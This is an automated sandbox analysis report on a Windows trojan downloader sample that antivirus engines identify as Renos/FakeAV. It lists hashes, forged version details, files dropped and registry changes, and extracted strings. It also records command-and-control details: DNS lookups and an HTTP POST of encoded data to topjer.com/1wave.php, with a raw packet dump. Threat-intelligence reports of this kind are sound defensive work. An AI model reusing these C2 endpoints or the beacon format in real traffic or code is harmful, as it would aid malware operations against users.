Analysis Date: 2014-08-06 08:36:53
MD5: 787f81342859da8d03f7d270649b4f14
SHA1: ecd0b636349a42e0e912d12d1f8bae23f7a02dc6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 1f3446fb8e07bdab14402c95ec4624d0 sha1: bb4a233c42669360a97590ffdb8e840b8a3a69e3 size: 7680
Section .data md5: 2b37fa123044075a3c0d409b922bee2e sha1: 182a2871c2b62b931bcb9c0ec5f19bff1f14491b size: 10752
Section .bss md5: 22a2ab68b2f318c84b3d0461ccba56ac sha1: e6230dfd42b4841eb62480cebd9150a6b13d2585 size: 100864
Section .idata md5: 32009447b391a7a2707bc7e07897c308 sha1: 2db551e964853c8758e7d613761d3da15e93e280 size: 4608
Section .rsrc md5: 80ea2caa92fb9de4cadd1a236011d64a sha1: 29f0fc1f37316512e0cba83f395360306317e1c0 size: 4096
Timestamp: 2009-09-09 01:48:01
Version:
LegalCopyright: Copyright © 2010 PC Tools. All rights reserved. P6
InternalName: imagP.exe
FileVersion: 7.0.0.61
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: u
ProductVersion: 7.0.0.61
FileDescription: 0Video Component
OriginalFilename: imagP.exe
PEhash: ab73bed486f238541ca7936c5ffd9b430529f6a2
IMPhash: 894524e807dc325d6889e01ac0f2d934
AV 360 Safe: Trojan.Generic.KDV.202242
AV Ad-Aware: Trojan.Generic.KDV.202242
AV Alwil (avast): Renos-AIG [Drp]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/FakeAlert.KN.gen!Eldorado
AV Avira (antivir): TR/Dldr.Renos.PP.7
AV CA (E-Trust Ino): Win32/Renos.D!generic
AV CAT (quickheal): Trojan.Renos.LN
AV ClamAV: Win.Trojan.Renos-39
AV Dr. Web: Trojan.Packed.21448
AV Emsisoft: Trojan.Generic.KDV.202242
AV Eset (nod32): Win32/Kryptik.NCQ
AV Fortinet: W32/Krypt.QKV!tr
AV Frisk (f-prot): W32/FakeAlert.KN.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Trojan.Generic.KDV.202242
AV Grisoft (avg): Downloader.Generic11.UWO
AV Ikarus: Trojan-Downloader.SuspectCRC
AV K7: Trojan ( 00417b9b1 )
AV Kaspersky: Hoax.Win32.FlashApp.gen
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-CEW.ap
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.PT
AV MicroWorld (escan): Trojan.Generic.KDV.202242
AV Norman: winpe/Crypt.AVWT
AV Rising: Trojan.Win32.Generic.128685EA
AV Sophos: Mal/FakeAV-IZ
AV Symantec: Trojan.FakeAV
AV Trend Micro: TROJ_AGENT.SMAH
AV VirusBlokAda (vba32): Trojan.ExpProc.EA

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\Ojawia.exe
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\Ojawia.exe
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

Registry: HKEY_CURRENT_USER\Software\PT25DHYRAW\OhuD ➝ 5
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝ NULL
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNS: 4399.com
Type: A
115.182.52.231
DNS: usps.com
Type: A
56.0.134.100
DNS: vk.com
Type: A
87.240.131.117
DNS: vk.com
Type: A
87.240.131.118
DNS: vk.com
Type: A
87.240.143.241
DNS: topjer.com
Type: A
31.170.165.149
DNS: topsaj.com
Type: A
DNS: hawfruit.com
Type: A
HTTP POST: http://topjer.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 31.170.165.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a20746f   ncoded..Host: to
0x00000060 (00096)   706a6572 2e636f6d 0d0a5573 65722d41   pjer.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a38547a 5a663678   ZR73lEXxz8TzZf6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 66663845 72696946 32555977   BH/4ff8EriiF2UYw
0x00000210 (00528)   536c6572 34484378 6777415a 3442       Sler4HCxgwAZ4B


Strings
A.
o
g
..]..<
E..
..`uGc
040904E4
0Video Component
 2010  PC Tools.  All rights reserved. P6
7.0.0.61
&About
BBABORT
BBALL
BBCANCEL
Comments
CompanyName
Copyright 
E&xit
&File
FileDescription
FileVersion
imagP.exe
InternalName
LegalCopyright
LegalTrademarks
MAINMENU(
&Open
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VB33
videosoft
VS_VERSION_INFO
zVlS
%02x)`L
0@;5.G@
07z3;`
$]0A8'r
+0J8Ic
0JahLf
0J@,DT
0uef'L
0X|^e9
0y'JCC
0#z4,Vtd
1a@zXLp 
1i-(:-
?1=,J@
1?Xgign
1zqlRp
]27$Gm
2UHZj6
:33:"$
"*"$33
3333:"$
333333
3333333
$3333333
33333333
33333333?333333
333333333333333333
3333333333333338
333333:"33333338
33333:"$3333338
3333339
333338
33333833
#33338
:*"*"$3338
333838
334C33333338
33B$3333333
34""C33333833
3B""$33333
3:ecYBa
*3Y(1by
486EAfpr 2Pn01
48(ud$
4"*""C3338
4_h6/c3
*4hyS"5qP[
4*>)s>X2z
+4ys`S
5LChBW
5^Pd)F
60#E~M
6yy1N1
7JH,d,
;85Ot^"hrf]
8d1HgI
-8j`AA,
8JT,dx
8'L|$Tu
8&M.[L
8zHLT `
+9'Af^[x
9IQU(eV
}9MZ(8}4
;	{9$)Rd
	9=z4_
$A26r^
A4UDUG
_acmdln
ActivateKeyboardLayout
?Ad#>A
ad$!E,G
AdjustWindowRectEx
A%egr<
aH	l,K
a$L4 D
aLzdL| 
; A}}P
  </application> 
  <application> 
@aSHLWm
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows - Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
a z0L@ P
BERIPRD
BJJ,^l
b\Jly``p
bL[|84_
BLd_.M
-BP8z~
b<rLtq
BT|,Xj
BVYA5t
Bv=zRz
_BwHxs
+(B@X+4BTd+@B
"C3338
"C8338
CallWindowProcA
CeHZLz7
CharLowerA
CharLowerBuffA
ChildWindowFromPoint
cj@S.Y 
CompareStringA
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
cQZ^&y
CreateFileA
CreateMenu
CreatePopupMenu
C:SR%9
Ctn4eh_HmE
|cW{Oc
@/_{Cx
D046u1iLV
^:dAg`
`.data
[Dc>*h
DefMDIChildProcA
DefWindowProcA
DeleteFileA
DestroyCursor
DestroyMenu
*dItxh
DJP,dp
dpFnee
DrawFrameControl
DrawIconEx
DrawTextA
d=,uYt
'Dz'1|*=
DZdqHdh
e9RVS"D#
EiRWQPjH
EnableWindow
EndDialog
EqualRect
"[e#>r
E<_vr}
ExitProcess
`~@>@f?'3
f3NTE#,
f4InK-Y
f6?mzP
>;=FG@
FindFirstFileA
Fmj;pDtO
 Fo0u4
FrameRect
fRQiSP
FVgJbA
\>F&W]
F?>w&O
Fz7zt 
g1 &FI
#\'G7p(
G98b7654Lf:\t
G?CV6i<V
GeftCurU
GetCapture
GetClassLongA
GetClassNameA
GetClipboardData
GetCurrentProcess
GetDateFormatA
GetDCEx
GetDiskFreeSpaceA
GetFullPathNameA
GetKeyNameTextA
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuItemCount
GetSubMenu
GetSysColorBrush
GetSystemDefaultLangID
GetSystemMenu
GetSystemMetrics
GetWindowTextA
GH7kBA
(gj&D[*^E
GlFL8h
_GobLB@20
GS~2"V
'gSmJ&$
G}vCI$
GZ(ywf
*!h`")
}H98b%
[h^%9YA
h!At>7N[
HeapFree
HEs(ui
h(>+(I`t
<HqYhAY3
hz.38_
*:hZHa
hzlLp 
Hz\Lt |
}!HZOG
,HZPO2
HZ,qTdL
hzU9Lw
(I0aVP?
I|3g8e
I]<bFi
ickCsoun
@.idata
iH#0Kh
$II5$,
IiUNIQSTR
IJcofI
imagP.exe
InflateRect
InitializeCriticalSection
InsertMenuA
iP4fsNy
IqxlgNW
Ir=!=1G
 |IRVH
IsCharLowerA
IsDialogMessageW
.[ITgOS
It|	y6
(@iv0C
IVuqMA
IZ\0JJ
$J0,<H
"J333333
j4hC7EVcJO@24
j]53sy
Ja(,>H
"J"C3333
JD;Fau
jE42`K
J=|=g[
$J,,<h
Jht$DKL
JHvFcnG
>^*jJ?p
j(LD `
j(L< L
jM+0{H>
J*nBk7
@JX,`d
k,9~8|DGU?Ht
kernel32.dll
ki|nYx*a
@kj>oT
KLg%*q
k n`.frdat0z$q
KP1|#@y
(kt)3 
!Kv)K|1`
K<[yNI
l`}8<T
l& !aH
lbIHxp
_LdTwov1MAv
~L $(j
LoadCursorA
LoadIconA
LoadLibraryA
LoadLibraryExA
}lqHn.
l@Qm6t
lstrcpyA
lstrlenW
L,tJPyx`T
LtV93H
Lz\Lx 
LZTBz *@
M1o8iD
m#8Hb^
main.cpl
malloc
m)andLi
%^MBh%H
Md1 gI0
memcpy
memmove
MessageBeep
MG|eXy
mo7&fI
MoveFileExA
MoveWindow
*Mr0S(?
_Mr9bsV_TwMVATk@12
MSVaCP60
MSVCRT.dll
mSWHK6
MtZxVL
MulDi5v
MulDiv
~MU:"M
Mx(z6q
,<M!Z4
^(n($ 
n73Cc;
n!DpXn
N)e9Nu
Nhh9&qYNF
NIz(vWr
~$n(j,
!N LN7'
N}.+'Y{
O0S3SZyW
O<>a7R
ObATDIO
OffsetRect
OLEACUT2{
OmrAKfb
o.O&l<
OOnEsm5
OpenClipboard
OpQpMql
)oQ'r]
_owuIQmGznwjW@24
Ox)h@$X
oY=m%),
P8iA\0
P$8&Wf
>P9Bx~<J
p9sZ3A0
\pb`	ph`a
pcjD5J
PeekMessageA
PGF5f@4
PostMessageA
pu";Kw
pu;msuI
pV KW,4\
Pvy(*t
PZ@qTdD
**+Q)d
-Q dP.2
rC|h,]V
 RdB]a
RegisterClassA
RegisterClipboardFormatA
RemoveMenu
RemovePropA
RE*:o*
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
;rF:D)
r~P``%)
,r PJI%@
@.rsrc
s@&CGO
      </security>
      <security>
SendMessageA
SetCapture
SetClassLongA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetHandleCount
SetMenu
SetMenuItemInfoA
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
SetWindowTextA
sk:op+
SL*qvLa
Sm[H$U
sprintf
SRQPjWja
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
swprintf
SXgYonLv146jfj
SystemParametersInfoA
-_*sZt
Ta@Lx9i
tb=^Ix
}tc2V|
tGmxbb
ThdaQdI
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
+tI|+E
tigDaI1GtB@12
_T@j D}G
TlIzGM
t.=l\R
%tnBv-
&Tnq*a
TO6*A-
}$:t[ojD
tolower
tpU-uJ9
TranslateMDISysAccel
TranslateMessage
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t}uY=U'j
t!*"'w
tY4`*}Y{
t;yCZ	
[=tzKf
Tz`Lh p
TzLL> 6
TZtq\dx
U,8Dm+
U-9 $6d
u@/#aHS
u_B^s@DUJ
U;Fa^u1?3
UpdateWindow
user32.dll
(U Sy:f
uvR?VvFi_
!|(uY;
VirtualAllocEx
voN04n
v(u+/	\9D
VvLEeu3c
v>y9} 
Vy(SK.E
!w`~",(
_*@W5|A
W9^?k4v
wcschr
wcscspn
wcstol
(W {;|D
W|qb3v
<WRR)}*(
wrTZ7t#
Wu=Rg>
w	VH49}
xA-4*P
Xchx)/HF
X*|ezw
Xf[YZd
X-!ILo|
x,lJ|ypa
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xouRt_Qf
xr[0&'
x;S K\
XV<.kV
{#x,|:x >^
x[z8+I	
y`.\1Ws0$
yCla,Z*
yc##XZ
yDnjPJ
_yhLRrFDcWCNP4
_yI!yK
y J0,@X
YJavSL
,Z4~+8J@+
$z8LL X
Z'A|8Z~
&zDL` 
zEgDN{;(}
zfi={Y
Z Jwzy$d,
 z(L0 8
@z\Ld t
@zLLX l
z:MvHb
`zpLx 
@Z,qDd0
Z`&Q/t8
zvPjhn